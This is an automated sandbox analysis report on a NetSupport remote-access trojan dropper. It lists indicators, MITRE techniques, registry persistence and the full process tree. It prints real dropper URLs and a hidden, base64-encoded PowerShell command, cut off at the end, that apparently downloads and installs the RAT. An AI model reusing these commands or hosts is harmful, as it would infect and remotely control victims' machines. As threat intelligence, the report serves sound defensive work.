netsupport | f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266

Analysis

max time kernel
122s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20240802-en
resource tags

arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
submitted
07-10-2024 02:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe
Size

46.2MB
MD5

9e1f57731569a5ccbd7526f3ae1c4b50
SHA1

1c7915b594ea634885c57c2281a8ce77483f1961
SHA256

f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266
SHA512

b0368552bd8e7b971210edfa6bba06891c6a41f5c2c61b2a9109dd120df5e0f865ec32ea363fc170473540b7f836ce5ce74f9b11a6f705d2b384e96107411e26
SSDEEP

786432:FT8dGiVeQ4LJ3fj4cV7WP4S8o1cZKMjWHZh0Rhp5MRd41Vlbr2BGkKq+qTOFUiRW:F1OeQQFf7V6XnqbcIHMRihr2Mkp+qiFu

Score

10^/10

netsupport discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://gailsacademy.com/fza/f1a.zip

exe.dropper

https://gailsacademy.com/fza/f4a.zip

exe.dropper

https://gailsacademy.com/fza/f3a.zip

exe.dropper

https://gailsacademy.com/fza/f2a.zip

exe.dropper

https://gailsacademy.com/fzf/

Signatures

NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
3776	powershell.exe

Executes dropped EXE 5 IoCs

Processes:

install.exejavaw.exevlc.exevlc.execlient32.exe

pid	Process
684	install.exe
3616	javaw.exe
208	vlc.exe
3320	vlc.exe
2220	client32.exe

Loads dropped DLL 24 IoCs

Processes:

javaw.exevlc.exevlc.execlient32.exe

pid	Process
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
3616	javaw.exe
208	vlc.exe
208	vlc.exe
3320	vlc.exe
3320	vlc.exe
2220	client32.exe
2220	client32.exe
2220	client32.exe
2220	client32.exe
2220	client32.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\TempControll = "C:\\Users\\Admin\\AppData\\Roaming\\TempControll\\client32.exe"	powershell.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

Processes:

flow	ioc
18	pastebin.com
19	pastebin.com

Suspicious use of SetThreadContext 1 IoCs

Processes:

vlc.exe

description	pid	Process	procid_target
PID 3320 set thread context of 3112	3320	vlc.exe	123

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 34 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

cmd.exeRdrCEF.exeWMIC.execmd.execmd.exemore.comchcp.comf659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exeinstall.execmd.exeAcroRd32.exepowershell.exeRdrCEF.exechcp.comchcp.compowershell.exejavaw.execmd.execmd.exeexplorer.exeRdrCEF.exechcp.comWMIC.exemore.comcmd.exeRdrCEF.exeRdrCEF.exeRdrCEF.exechcp.commore.comclient32.exeexplorer.exeWMIC.exeRdrCEF.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AcroRd32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	javaw.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	chcp.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	more.com
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	client32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RdrCEF.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AcroRd32.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	AcroRd32.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	AcroRd32.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

Processes:

AcroRd32.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	AcroRd32.exe

Modifies registry class 1 IoCs

Processes:

explorer.exe

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1194130065-3471212556-1656947724-1000_Classes\Local Settings	explorer.exe

Suspicious behavior: EnumeratesProcesses 31 IoCs

Processes:

vlc.exepowershell.exevlc.exepowershell.execmd.exeAcroRd32.exe

pid	Process
208	vlc.exe
3776	powershell.exe
3320	vlc.exe
3776	powershell.exe
3320	vlc.exe
1632	powershell.exe
1632	powershell.exe
3112	cmd.exe
3112	cmd.exe
3112	cmd.exe
3112	cmd.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe

Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

vlc.execmd.exe

pid	Process
3320	vlc.exe
3112	cmd.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

WMIC.exeWMIC.exe

description	pid	Process
Token: SeIncreaseQuotaPrivilege	1632	WMIC.exe
Token: SeSecurityPrivilege	1632	WMIC.exe
Token: SeTakeOwnershipPrivilege	1632	WMIC.exe
Token: SeLoadDriverPrivilege	1632	WMIC.exe
Token: SeSystemProfilePrivilege	1632	WMIC.exe
Token: SeSystemtimePrivilege	1632	WMIC.exe
Token: SeProfSingleProcessPrivilege	1632	WMIC.exe
Token: SeIncBasePriorityPrivilege	1632	WMIC.exe
Token: SeCreatePagefilePrivilege	1632	WMIC.exe
Token: SeBackupPrivilege	1632	WMIC.exe
Token: SeRestorePrivilege	1632	WMIC.exe
Token: SeShutdownPrivilege	1632	WMIC.exe
Token: SeDebugPrivilege	1632	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1632	WMIC.exe
Token: SeRemoteShutdownPrivilege	1632	WMIC.exe
Token: SeUndockPrivilege	1632	WMIC.exe
Token: SeManageVolumePrivilege	1632	WMIC.exe
Token: 33	1632	WMIC.exe
Token: 34	1632	WMIC.exe
Token: 35	1632	WMIC.exe
Token: 36	1632	WMIC.exe
Token: SeIncreaseQuotaPrivilege	1632	WMIC.exe
Token: SeSecurityPrivilege	1632	WMIC.exe
Token: SeTakeOwnershipPrivilege	1632	WMIC.exe
Token: SeLoadDriverPrivilege	1632	WMIC.exe
Token: SeSystemProfilePrivilege	1632	WMIC.exe
Token: SeSystemtimePrivilege	1632	WMIC.exe
Token: SeProfSingleProcessPrivilege	1632	WMIC.exe
Token: SeIncBasePriorityPrivilege	1632	WMIC.exe
Token: SeCreatePagefilePrivilege	1632	WMIC.exe
Token: SeBackupPrivilege	1632	WMIC.exe
Token: SeRestorePrivilege	1632	WMIC.exe
Token: SeShutdownPrivilege	1632	WMIC.exe
Token: SeDebugPrivilege	1632	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1632	WMIC.exe
Token: SeRemoteShutdownPrivilege	1632	WMIC.exe
Token: SeUndockPrivilege	1632	WMIC.exe
Token: SeManageVolumePrivilege	1632	WMIC.exe
Token: 33	1632	WMIC.exe
Token: 34	1632	WMIC.exe
Token: 35	1632	WMIC.exe
Token: 36	1632	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2216	WMIC.exe
Token: SeSecurityPrivilege	2216	WMIC.exe
Token: SeTakeOwnershipPrivilege	2216	WMIC.exe
Token: SeLoadDriverPrivilege	2216	WMIC.exe
Token: SeSystemProfilePrivilege	2216	WMIC.exe
Token: SeSystemtimePrivilege	2216	WMIC.exe
Token: SeProfSingleProcessPrivilege	2216	WMIC.exe
Token: SeIncBasePriorityPrivilege	2216	WMIC.exe
Token: SeCreatePagefilePrivilege	2216	WMIC.exe
Token: SeBackupPrivilege	2216	WMIC.exe
Token: SeRestorePrivilege	2216	WMIC.exe
Token: SeShutdownPrivilege	2216	WMIC.exe
Token: SeDebugPrivilege	2216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2216	WMIC.exe
Token: SeRemoteShutdownPrivilege	2216	WMIC.exe
Token: SeUndockPrivilege	2216	WMIC.exe
Token: SeManageVolumePrivilege	2216	WMIC.exe
Token: 33	2216	WMIC.exe
Token: 34	2216	WMIC.exe
Token: 35	2216	WMIC.exe
Token: 36	2216	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2216	WMIC.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

AcroRd32.execlient32.exe

pid	Process
1336	AcroRd32.exe
2220	client32.exe

Suspicious use of SetWindowsHookEx 7 IoCs

Processes:

javaw.exeAcroRd32.exe

pid	Process
3616	javaw.exe
3616	javaw.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe
1336	AcroRd32.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exeinstall.exejavaw.execmd.execmd.execmd.execmd.execmd.exe

description	pid	Process	procid_target
PID 916 wrote to memory of 684	916	f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe	83
PID 916 wrote to memory of 684	916	f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe	83
PID 916 wrote to memory of 684	916	f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe	83
PID 684 wrote to memory of 3616	684	install.exe	84
PID 684 wrote to memory of 3616	684	install.exe	84
PID 684 wrote to memory of 3616	684	install.exe	84
PID 3616 wrote to memory of 744	3616	javaw.exe	89
PID 3616 wrote to memory of 744	3616	javaw.exe	89
PID 3616 wrote to memory of 744	3616	javaw.exe	89
PID 744 wrote to memory of 4612	744	cmd.exe	91
PID 744 wrote to memory of 4612	744	cmd.exe	91
PID 744 wrote to memory of 4612	744	cmd.exe	91
PID 744 wrote to memory of 3532	744	cmd.exe	92
PID 744 wrote to memory of 3532	744	cmd.exe	92
PID 3616 wrote to memory of 3376	3616	javaw.exe	93
PID 3616 wrote to memory of 3376	3616	javaw.exe	93
PID 3616 wrote to memory of 3376	3616	javaw.exe	93
PID 3376 wrote to memory of 4216	3376	cmd.exe	95
PID 3376 wrote to memory of 4216	3376	cmd.exe	95
PID 3376 wrote to memory of 4216	3376	cmd.exe	95
PID 3376 wrote to memory of 1632	3376	cmd.exe	96
PID 3376 wrote to memory of 1632	3376	cmd.exe	96
PID 3376 wrote to memory of 1632	3376	cmd.exe	96
PID 3376 wrote to memory of 5116	3376	cmd.exe	97
PID 3376 wrote to memory of 5116	3376	cmd.exe	97
PID 3376 wrote to memory of 5116	3376	cmd.exe	97
PID 3616 wrote to memory of 1532	3616	javaw.exe	98
PID 3616 wrote to memory of 1532	3616	javaw.exe	98
PID 3616 wrote to memory of 1532	3616	javaw.exe	98
PID 1532 wrote to memory of 4904	1532	cmd.exe	100
PID 1532 wrote to memory of 4904	1532	cmd.exe	100
PID 1532 wrote to memory of 4904	1532	cmd.exe	100
PID 1532 wrote to memory of 2216	1532	cmd.exe	101
PID 1532 wrote to memory of 2216	1532	cmd.exe	101
PID 1532 wrote to memory of 2216	1532	cmd.exe	101
PID 1532 wrote to memory of 2808	1532	cmd.exe	102
PID 1532 wrote to memory of 2808	1532	cmd.exe	102
PID 1532 wrote to memory of 2808	1532	cmd.exe	102
PID 3616 wrote to memory of 1452	3616	javaw.exe	103
PID 3616 wrote to memory of 1452	3616	javaw.exe	103
PID 3616 wrote to memory of 1452	3616	javaw.exe	103
PID 1452 wrote to memory of 4996	1452	cmd.exe	105
PID 1452 wrote to memory of 4996	1452	cmd.exe	105
PID 1452 wrote to memory of 4996	1452	cmd.exe	105
PID 1452 wrote to memory of 1712	1452	cmd.exe	106
PID 1452 wrote to memory of 1712	1452	cmd.exe	106
PID 1452 wrote to memory of 1712	1452	cmd.exe	106
PID 1452 wrote to memory of 3744	1452	cmd.exe	107
PID 1452 wrote to memory of 3744	1452	cmd.exe	107
PID 1452 wrote to memory of 3744	1452	cmd.exe	107
PID 3616 wrote to memory of 4900	3616	javaw.exe	108
PID 3616 wrote to memory of 4900	3616	javaw.exe	108
PID 3616 wrote to memory of 4900	3616	javaw.exe	108
PID 4900 wrote to memory of 3508	4900	cmd.exe	110
PID 4900 wrote to memory of 3508	4900	cmd.exe	110
PID 4900 wrote to memory of 3508	4900	cmd.exe	110
PID 4900 wrote to memory of 1520	4900	cmd.exe	111
PID 4900 wrote to memory of 1520	4900	cmd.exe	111
PID 3616 wrote to memory of 3776	3616	javaw.exe	115
PID 3616 wrote to memory of 3776	3616	javaw.exe	115
PID 3616 wrote to memory of 3776	3616	javaw.exe	115
PID 3616 wrote to memory of 2260	3616	javaw.exe	117
PID 3616 wrote to memory of 2260	3616	javaw.exe	117
PID 3616 wrote to memory of 2260	3616	javaw.exe	117

C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe
"C:\Users\Admin\AppData\Local\Temp\f659219bbbb50593d0cd629ccf48faca878b444162b14863854480a7c9289266.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:916
- C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
  C:\Users\Admin\AppData\Roaming\InstallerPDW\install.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:684
- - C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe
    "C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\javaw.exe" -Dfile.encoding=UTF-8 -classpath "jre\.;jre\..;jre\asm-all.jar;jre\bin;jre\COPYRIGHT;jre\dn-compiled-module.jar;jre\dn-php-sdk.jar;jre\gson.jar;jre\jphp-app-framework.jar;jre\jphp-core.jar;jre\jphp-desktop-ext.jar;jre\jphp-gui-ext.jar;jre\jphp-json-ext.jar;jre\jphp-runtime.jar;jre\jphp-xml-ext.jar;jre\jphp-zend-ext.jar;jre\jphp-zip-ext.jar;jre\lib;jre\LICENSE;jre\README.txt;jre\release;jre\slf4j-api.jar;jre\slf4j-simple.jar;jre\THIRDPARTYLICENSEREADME-JAVAFX.txt;jre\THIRDPARTYLICENSEREADME.txt;jre\Welcome.html;jre\zt-zip.jar" org.develnext.jphp.ext.javafx.FXLauncher
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:3616
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:744
    - - C:\Windows\SysWOW64\chcp.com
        
        C:\Windows\System32\chcp.com 65001
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4612
    - - C:\Windows\system32\reg.exe
        
        C:\Windows\SysNative\reg.exe query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v "CurrentBuild"
        5⤵
        
        PID:3532
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List | C:\Windows\System32\more.com"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:3376
    - - C:\Windows\SysWOW64\chcp.com
        
        C:\Windows\System32\chcp.com 866
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4216
    - - C:\Windows\SysWOW64\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\wmic.exe CPU get Name /Format:List
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:1632
    - - C:\Windows\SysWOW64\more.com
        
        C:\Windows\System32\more.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:5116
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List | C:\Windows\System32\more.com"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1532
    - - C:\Windows\SysWOW64\chcp.com
        
        C:\Windows\System32\chcp.com 866
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4904
    - - C:\Windows\SysWOW64\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\wmic.exe Path Win32_VideoController Get AdapterCompatibility /Format:List
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of AdjustPrivilegeToken
        
        PID:2216
    - - C:\Windows\SysWOW64\more.com
        
        C:\Windows\System32\more.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2808
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 866>nul & C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List | C:\Windows\System32\more.com"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1452
    - - C:\Windows\SysWOW64\chcp.com
        
        C:\Windows\System32\chcp.com 866
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:4996
    - - C:\Windows\SysWOW64\wbem\WMIC.exe
        
        C:\Windows\System32\wbem\wmic.exe path Win32_ComputerSystem get TotalPhysicalMemory /Format:List
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:1712
    - - C:\Windows\SysWOW64\more.com
        
        C:\Windows\System32\more.com
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3744
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\System32\cmd.exe /c "C:\Windows\System32\chcp.com 65001>nul & C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19""
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:4900
    - - C:\Windows\SysWOW64\chcp.com
        
        C:\Windows\System32\chcp.com 65001
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:3508
    - - C:\Windows\system32\reg.exe
        
        C:\Windows\SysNative\reg.exe query "HKU\S-1-5-19"
        5⤵
        
        PID:1520
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "& {$script = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('cG93RXJTSGVMTCAtbm9wUm8gLUV4ZWNVVElvTnBPIEJZcGFTUyAtdyBISWQgLWVjIEpBQnBBR1VBVVFCeUFHUUFPUUJrQUVNQVBRQW5BR2dBZEFCMEFIQUFjd0E2QUM4QUx3Qm5BR0VBYVFCc0FITUFZUUJqQUdFQVpBQmxBRzBBZVFBdUFHTUFid0J0QUM4QVpnQjZBR0VBTHdCbUFERUFZUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFTQUJrQUVFQVZnQjVBSEVBU0FBOUFFY0FZd0JOQUNBQVpRQjRBSEFBUVFCT0FHUUFMUUJCQUhJQVF3QklBRWtBVmdCbEFDQUFMUUJGQUhJQWNnQlBBSElBUVFCakFGUUFhUUJQQUc0QUlBQnpBRWtBVEFCbEFFNEFWQUJzQUZrQVF3QlBBRzRBVkFCSkFFNEFWUUJsQURzQUlBQWtBSFVBYXdCWUFGZ0FVZ0JHQUVrQVpRQTlBQ2NBYlFBekFESUFWd0JXQURVQVlnQlNBQzRBZWdCcEFIQUFKd0E3QUNBQUpBQlNBSElBVGdCb0FFZ0FTUUJsQUQwQUp3Qm9BSFFBZEFCd0FITUFPZ0F2QUM4QVp3QmhBR2tBYkFCekFHRUFZd0JoQUdRQVpRQnRBSGtBTGdCakFHOEFiUUF2QUdZQWVnQmhBQzhBWmdBMEFHRUFMZ0I2QUdrQWNBQW5BRHNBSUFBa0FITUFWUUJDQUhBQVlnQm1BRGdBUFFBbkFFd0FUd0F4QUdrQWJnQk9BRUVBTGdCNkFHa0FjQUFuQURzQUlBQWtBRzRBUlFBMEFFRUFUZ0JNQUdZQVBRQkhBR01BVFFBZ0FGTUFWQUJoQUhJQVZBQXRBR0lBYVFCVUFITUFkQUJTQUdFQWJnQnpBR1lBWlFCeUFDQUFMUUJsQUhJQWNnQlBBRklBWVFCakFGUUFTUUJ2QUU0QUlBQlRBR2tBYkFCbEFFNEFWQUJNQUhrQVl3QnZBRTRBVkFCSkFHNEFkUUJGQURzQUlBQWtBR0lBYkFCaUFHVUFjQUI2QUZvQVBRQW5BRFlBUkFCTkFFd0FWUUF1QUhvQWFRQndBQ2NBT3dBZ0FDUUFVZ0JuQUhvQU5RQlhBRXdBYmdBOUFDY0FhQUIwQUhRQWNBQnpBRG9BTHdBdkFHY0FZUUJwQUd3QWN3QmhBR01BWVFCa0FHVUFiUUI1QUM0QVl3QnZBRzBBTHdCbUFIb0FZUUF2QUdZQU13QmhBQzRBZWdCcEFIQUFKd0E3QUNBQVd3QnVBR1VBZEFBdUFITUFSUUJ5QUhZQWFRQkRBRVVBVUFCUEFFa0FUZ0IwQUcwQVFRQk9BRUVBUndCRkFGSUFYUUE2QURvQWN3QmxBRU1BZFFCU0FFa0FWQUJaQUhBQVVnQlBBRlFBYndCakFFOEFiQUFnQUQwQUlBQmJBRTRBWlFCMEFDNEFjd0JGQUdNQVZRQlNBRWtBVkFCWkFGQUFVZ0JQQUhRQVR3QmpBRThBVEFCMEFGa0FjQUJsQUYwQU9nQTZBRlFBVEFCVEFERUFNZ0E3QUNBQUpBQkpBRzRBUXdCSEFESUFNZ0JXQUVvQVBRQW5BRlFBWlFCdEFIQUFRd0J2QUc0QWRBQnlBRzhBYkFCc0FDY0FPd0FnQUNRQU5BQjVBRVlBWXdCS0FGWUFTZ0E5QUNjQWJBQTRBR1VBUmdCV0FFOEFVd0JUQUM0QWVnQnBBSEFBSndBN0FDQUFZd0JFQUNBQUpBQkZBRzRBZGdBNkFFRUFjQUJ3QUdRQVlRQjBBR0VBT3dBZ0FDUUFSQUF6QUdjQWJBQndBRDBBSndCb0FIUUFkQUJ3QUhNQU9nQXZBQzhBWndCaEFHa0FiQUJ6QUdFQVl3QmhBR1FBWlFCdEFIa0FMZ0JqQUc4QWJRQXZBR1lBZWdCaEFDOEFaZ0F5QUdFQUxnQjZBR2tBY0FBbkFEc0FJQUFrQUVZQVl3QnRBRllBVndCekFGa0FQUUFpQUNRQVpRQk9BSFlBT2dCaEFGQUFVQUJrQUVFQWRBQkJBRndBSkFCaUFHd0FZZ0JsQUhBQWVnQmFBQ0lBT3dBZ0FDUUFlQUJJQUdZQU5RQjRBRzhBVFFCMUFEMEFJZ0FrQUdVQVRnQjJBRG9BUVFCd0FIQUFSQUJoQUhRQVFRQmNBQ1FBY3dCVkFFSUFjQUJpQUdZQU9BQWlBRHNBSUFBa0FFNEFjd0JLQUhnQWRRQlpBRGdBVkFBOUFDSUFld0F3QUgwQVhBQjdBREVBZlFBaUFDQUFMUUJtQUNBQUpBQmxBRzRBVmdBNkFFRUFVQUJ3QUVRQVFRQjBBRUVBTEFBZ0FDUUFkUUJyQUZnQVdBQlNBRVlBU1FCbEFEc0FJQUFrQUdRQU1BQkVBRGNBV1FCd0FEMEFTZ0J2QUVrQVRnQXRBRkFBUVFCVUFHZ0FJQUF0QUhBQVFRQjBBRWdBSUFBa0FHVUFiZ0JXQURvQVFRQlFBSEFBUkFCQkFIUUFRUUFnQUMwQVl3QklBR2tBVEFCa0FGQUFRUUIwQUdnQUlBQWtBRFFBZVFCR0FHTUFTZ0JXQUVvQU93QWdBQ1FBU3dCT0FEWUFUUUJNQUhJQWJBQnFBRDBBSWdCaUFHa0FkQUJ6QUdFQVpBQk5BRWtBVGdBdUFHVUFXQUJsQUNBQUx3QlVBRklBUVFCT0FGTUFaZ0JsQUZJQUlBQjBBR0lBWlFCT0FHc0FJQUF2QUVRQVR3QlhBRzRBVEFCUEFFRUFSQUFnQUM4QVVBQnlBR2tBYndCU0FFa0FWQUJaQUNBQWJnQnZBSElBYlFCQkFFd0FJQUI3QURBQWZRQWdBSHNBTVFCOUFDSUFJQUF0QUdZQUlBQWtBRklBWndCNkFEVUFWd0JNQUc0QUxBQWdBQ1FBZUFCSUFHWUFOUUI0QUc4QVRRQjFBRHNBSUFBa0FIUUFRUUExQURBQVJRQTlBQ2NBUWdCSkFGUUFVd0JCQUdRQWJRQkpBRTRBTGdCRkFIZ0FSUUFnQUM4QVZBQlNBR0VBVGdCVEFHWUFSUUJ5QUNBQU1BQjJBR0VBYUFCc0FDQUFMd0JFQUU4QWR3QnVBRXdBVHdCQkFHUUFJQUF2QUhBQWNnQnBBRThBVWdCcEFGUUFlUUFnQUU0QVR3QnlBRTBBWVFCc0FDQUFKd0FyQUNRQVJBQXpBR2NBYkFCd0FDc0FKd0FnQUNjQUt3QWtBRVlBWXdCdEFGWUFWd0J6QUZrQU93QWdBQ1FBTWdCeEFHWUFhQUJKQUc4QVpRQTlBQ0lBSkFCRkFHNEFkZ0E2QUdFQWNBQndBRVFBUVFCVUFFRUFYQUFrQUVrQWJnQkRBRWNBTWdBeUFGWUFTZ0FpQURzQU